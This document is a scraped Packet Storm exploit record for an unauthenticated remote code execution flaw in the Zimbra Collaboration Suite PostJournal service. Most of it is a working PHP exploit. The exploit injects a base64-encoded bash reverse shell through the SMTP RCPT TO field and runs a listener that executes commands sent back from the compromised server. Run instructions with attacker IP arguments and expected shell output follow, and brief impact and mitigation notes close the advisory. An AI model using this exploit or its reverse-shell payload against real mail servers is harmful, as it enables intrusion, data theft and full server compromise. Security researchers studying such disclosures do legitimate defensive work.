{“lastseen”:”2025-11-26T18:14:02″,”description”:”Zimbra Collaboration Suite Postjournal version 8.8.15 unauthenticated proof of concept remote code execution exploit that leverages SMTP injection…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212108″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Zimbra Collaboration Suite Postjournal 8.8.15 Unauthenticated RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.zimbra.com\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n 1. Overview\\n ———–\\n A critical vulnerability exists in the Zimbra Collaboration Suite (ZCS) PostJournal service that allows attackers to execute arbitrary system commands without authentication. \\n The vulnerability is triggered through SMTP injection using a malicious RCPT TO parameter. This exploit provides full remote command execution (RCE) as the Zimbra user, enabling an attacker to gain a reverse shell.\\n \\n The root cause is improper sanitization of user-controlled email fields inside the PostJournal processing mechanism.\\n \\n ———————————————-\\n \\n 2. Vulnerability Details\\n ————————\\n The PostJournal service processes incoming emails and interacts with external components. Due to a command injection flaw in the way Zimbra handles the RCPT TO address, attackers can inject shell commands using syntax such as:\\n \\n RCPT TO:\\u003caabbb$(COMMAND)@domain.com\\u003e\\n \\n Zimbra interprets the `$()` expression as a shell command and executes it under the mail server context.\\n \\n This leads to full RCE.\\n \\n ———————————————-\\n \\n 3. Requirements\\n —————\\n \u2022 ZCS installation (vulnerable version) \\n \u2022 SMTP access reachable externally \\n \u2022 No authentication required \\n \u2022 Attacker\u2019s listener ready to receive reverse shell \\n \\n ———————————————-\\n \\n 4. Proof of Concept (PoC)\\n ————————-\\n The exploit uses standard SMTP commands:\\n \\n EHLO localhost\\n MAIL FROM:\\u003crandom@test.com\\u003e\\n RCPT TO:\\u003caabbb$(payload)@test.com\\u003e\\n DATA\\n Test\\n .\\n QUIT\\n \\n The payload is a Base64\u2011encoded reverse shell executed via:\\n \\n echo BASE64 | base64 -d | bash\\n \\n ———————————————-\\n \\n 5. PHP Exploit Code\\n ——————————————-\\n The following PHP PoC sends the exploit to Zimbra and creates a built\u2011in TCP listener without using `pcntl_fork()`:\\n \\n \\u003c?php\\n set_time_limit(0);\\n error_reporting(E_ALL);\\n ob_implicit_flush(true);\\n \\n class SMTPExploit {\\n private $target;\\n private $port;\\n private $lhost;\\n private $lport;\\n private $mail_from;\\n private $rcpt_to;\\n private $sock;\\n private $command;\\n \\n public function __construct($target, $port, $lhost, $lport) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003elhost = $lhost;\\n $this-\\u003elport = $lport;\\n \\n $this-\\u003email_from = $this-\\u003erandom_email();\\n $this-\\u003ercpt_to = $this-\\u003erandom_email();\\n $this-\\u003ecommand = $this-\\u003egenerate_b64_shell();\\n }\\n \\n private function random_email() {\\n return substr(md5(rand()), 0, 8).\\”@test.com\\”;\\n }\\n \\n private function generate_b64_shell() {\\n $cmd = \\”\/bin\/bash -i 5\\u003c\\u003e \/dev\/tcp\/{$this-\\u003elhost}\/{$this-\\u003elport} 0\\u003c\\u00265 1\\u003e\\u00265 2\\u003e\\u00265\\”;\\n $b64 = base64_encode($cmd);\\n return \\”echo ${b64}|base64 -d|bash\\”;\\n }\\n \\n private function injected_rcpt() {\\n return \\”aabbb\\\\$({$this-\\u003ecommand})@{$this-\\u003ercpt_to}\\”;\\n }\\n \\n private function connect() {\\n $this-\\u003esock = fsockopen($this-\\u003etarget, $this-\\u003eport, $e, $s, 10);\\n if (!$this-\\u003esock) die(\\”[!] Cannot connect to SMTP server\\\\n\\”);\\n fgets($this-\\u003esock, 4096);\\n }\\n \\n private function send($cmd) {\\n fwrite($this-\\u003esock, $cmd.\\”\\\\r\\\\n\\”);\\n return fgets($this-\\u003esock, 4096);\\n }\\n \\n public function run() {\\n echo \\”[*] Connecting to SMTP…\\\\n\\”;\\n $this-\\u003econnect();\\n \\n $this-\\u003esend(\\”EHLO localhost\\”);\\n $this-\\u003esend(\\”MAIL FROM:\\u003c{$this-\\u003email_from}\\u003e\\”);\\n \\n $inj = $this-\\u003einjected_rcpt();\\n $this-\\u003esend(\\”RCPT TO:\\u003c{$inj}\\u003e\\”);\\n \\n $this-\\u003esend(\\”DATA\\”);\\n fwrite($this-\\u003esock, \\”Test\\\\r\\\\n.\\\\r\\\\n\\”);\\n \\n $this-\\u003esend(\\”QUIT\\”);\\n fclose($this-\\u003esock);\\n \\n echo \\”[+] Exploit Sent.\\\\n\\”;\\n }\\n }\\n \\n class Listener {\\n private $host;\\n private $port;\\n \\n public function __construct($h, $p) {\\n $this-\\u003ehost = $h;\\n $this-\\u003eport = $p;\\n }\\n \\n public function start() {\\n echo \\”[*] Starting listener on {$this-\\u003ehost}:{$this-\\u003eport}\\\\n\\”;\\n \\n $sock = stream_socket_server(\\”tcp:\/\/{$this-\\u003ehost}:{$this-\\u003eport}\\”, $e, $s);\\n if (!$sock) die(\\”[!] Cannot start listener\\\\n\\”);\\n \\n while (true) {\\n $client = @stream_socket_accept($sock, 1);\\n if ($client) {\\n echo \\”[+] Connection received\\\\n\\”;\\n $this-\\u003einteractive($client);\\n fclose($client);\\n }\\n }\\n }\\n \\n private function interactive($client) {\\n fwrite($client, \\”Connected!\\\\n\\u003e \\”);\\n \\n while (!feof($client)) {\\n $cmd = trim(fgets($client));\\n \\n if ($cmd === \\”exit\\”) break;\\n \\n $out = shell_exec($cmd);\\n fwrite($client, $out . \\”\\\\n\\u003e \\”);\\n }\\n }\\n }\\n \\n $target = $argv[1] ?? \\”127.0.0.1\\”;\\n $port = $argv[2] ?? 25;\\n $lhost = $argv[3] ?? \\”0.0.0.0\\”;\\n $lport = $argv[4] ?? 4444;\\n \\n echo \\”[*] Launching listener thread…\\\\n\\”;\\n \\n $listener = new Listener($lhost, $lport);\\n \\n $listener_running = false;\\n $exploit_sent = false;\\n \\n while (true) {\\n \\n if (!$listener_running) {\\n echo \\”[*] Listener online…\\\\n\\”;\\n $listener_running = true;\\n $listener-\\u003estart();\\n }\\n \\n if (!$exploit_sent) {\\n echo \\”[*] Sending exploit…\\\\n\\”;\\n $e = new SMTPExploit($target, $port, $lhost, $lport);\\n $e-\\u003erun();\\n $exploit_sent = true;\\n }\\n \\n usleep(10000);\\n }\\n \\n ?\\u003e\\n \\n ————————-\\n How to Run the Exploit\\n ————————-\\n \\n ### **1. Save the script**\\n Save the code as:\\n \\n zimbra_rce.php\\n \\n ### **2. Start it from terminal**\\n Windows example:\\n \\n php zimbra_rce.php 192.168.1.50 25 192.168.1.10 4444\\n \\n Linux example:\\n \\n php zimbra_rce.php mail.example.com 25 attacker-ip 4444\\n \\n ### **Arguments format:**\\n \\n | Argument | Description |\\n |———|————-|\\n | 1 | Target Zimbra SMTP IP |\\n | 2 | SMTP port (default 25) |\\n | 3 | Attacker listener IP |\\n | 4 | Listener port |\\n \\n ### **3. Wait for Shell**\\n If the server is vulnerable, you will see:\\n \\n [*] Listener online…\\n [*] Sending exploit…\\n [+] Exploit Sent.\\n [+] Connection received\\n Connected!\\n \\u003e\\n \\n Now you have a remote shell.\\n ———————————————-\\n \\n 6. Impact\\n ———\\n \u2022 Full remote command execution \\n \u2022 Full server compromise possible \\n \u2022 Email data exposure \\n \u2022 Privilege escalation (depending on system configuration) \\n \u2022 Lateral movement inside the network \\n \\n ———————————————-\\n \\n 7. Mitigation\\n ————-\\n Until patches are applied:\\n \\n \u2022 Block external SMTP access to PostJournal component \\n \u2022 Apply strict sanitization rules for RCPT field \\n \u2022 Monitor suspicious SMTP activity \\n \u2022 Restrict Zimbra service user privileges \\n \\n ———————————————-\\n \\n 8. Conclusion\\n ————-\\n This vulnerability presents a severe risk and must be mitigated immediately. \\n The exploit demonstrates how a simple SMTP injection can lead to full RCE, highlighting the need for strict input validation in email\u2011processing systems.\\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212108″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212108\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-26T18:14:02″,”description”:”Zimbra Collaboration Suite Postjournal version 8.8.15 unauthenticated proof of concept remote code execution exploit that leverages SMTP injection…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-27753","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n